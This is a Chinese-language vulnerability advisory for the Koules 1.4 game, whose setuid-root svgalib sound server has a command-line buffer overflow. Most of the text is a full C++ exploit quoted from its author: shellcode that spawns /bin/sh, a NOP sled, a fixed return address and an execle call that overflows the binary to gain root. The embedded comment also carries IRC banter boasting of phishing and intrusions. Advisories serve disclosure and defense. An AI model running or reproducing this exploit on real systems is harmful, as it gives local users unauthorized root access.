发布日期：2000-11-22
更新日期：2000-11-22

受影响系统：

Jan Hubicka Koules 1.4
       - Slackware Linux 7.1
       - RedHat Linux 7.0
       - FreeBSD FreeBSD 4.2
       - Debian Linux 2.3

描述：

---

Koules是Jan Hubicka开发的一个游戏，这次的版本使用了svgalib。svgalib一般都
是按照setuid-to-root方式安装的，以便普通用户在主控台上运行时可以直接访问视
频硬件。但是在处理来自用户输入的命令行参数的时候存在一个缓冲区溢出漏洞，以
致普通用户有可能获取超级用户权限。

<* 来源：Guido Bakker (guidob@mainnet.nl) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.securityfocus.com/data/vulnerabilities/exploits/Coolz.cpp

--------------------------------------------------------------------------
/*
   Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

   This problem has been known since April this year, but I have not
   seen any exploit so far.

   First of all I wasn't planning to go and release another ordinary stack
   smash, but I found the setuid game on some wargame/hackme I played on.
   Funny thing was that the exploitability proved to be a bit harder than I
   had anticipated at first.

   The problem can be found in the Koules1.4 package, code file:
      koules.sndsrv.linux.c - function: init()

   The `int i` disappears in the optimization gcc does. Since the strcat()
   function concatenates an array of filenames, `argv` gets ruined.
   This will cause the first run of the loop to fail.
   If argv point somewhere into adressable memory space, the chances of
   having a second pointer in there are close to zero, thus the second loop
   will fail.
   Last of all, if the argv[1] does point to a valid address the string
   contained there shouldn't be long enough to overwrite eip a second time,
   since that gets us into trouble. That's about it :)
   Even then, this ONLY works on machines that have compiled SVGALIB support
   in and NOT on the X windows version of 'koules'.

  Requested IRC quotes:
    <dagger02> ik heb jeuk aan me ballen.

    <marshal-> waar ben jij nu mee bezig man
    <sArGeAnt> nog een keer sukkel
    <sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen

    <gmd-> sex ?

    <orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;)

    <silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
             compare to the julia set

    <jimjones> 4 years ago there was no aol account i couldnt phish, now my
               unix virii grow faster than the petry dish

    <dugje>  I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
             is only one goal left .. *.root-servers.net.

   Love goes out to: Hester and Maja
   Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
                     Richard Vriesde.
             --  We always did feel the same, we just saw it from a
                  different point of view...
                      [Bob Dylan - Tangled up in Blue]

<Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (:
<dugje> ghehe ... je een plaatsje hoger zetten op de priority list ..

   -- Scrippie/ronald@grafix.nl
/*

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP     'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */

string heavenlycode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

using namespace std;

main()
{
   string payload, vector;
   unsigned int i;
   const char *env[3];
   const char *ptr_to_bffffffc;

   /* Construction of our payload */
   payload.append(NUMNOPS, NOP);
   payload.append(heavenlycode);

   env[0] = payload.c_str();
   /* This memory address always contains 0x00000000 */
   env[1] = "\xfc\xff\xff\xbf";
   env[2] = NULL;

   /* Calculate for yourself, and check out: linux/fs/exec.c */
   ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                    -sizeof(heavenlycode)-sizeof(char *)-1));

   for(i=0;i<256;i++) {
      vector.append(RETADDY);           /* Fill the buffer */
   }
   /* We do NOT overwrite 'int i' - a register is used after gcc -O */
   vector.append(RETADDY);              /* Overwrites ebp */
   vector.append(RETADDY);              /* Overwrites eip */
   vector.append(ptr_to_bffffffc);      /* Overwrites argv argument */

   execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
          NULL, env);

   perror("execle()");
}

char *addytostr(unsigned char *blaat)
{
   char *ret;

   if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
      perror("malloc()");
      exit(EXIT_FAILURE);
   }
   memcpy(ret, &blaat, sizeof(unsigned char *));
   ret[sizeof(unsigned char *)] = 0x00;

   return(ret);
}
--------------------------------------------------------------------------



建议：

---

    暂无

浏览次数：5780
严重程度：0（网友投票）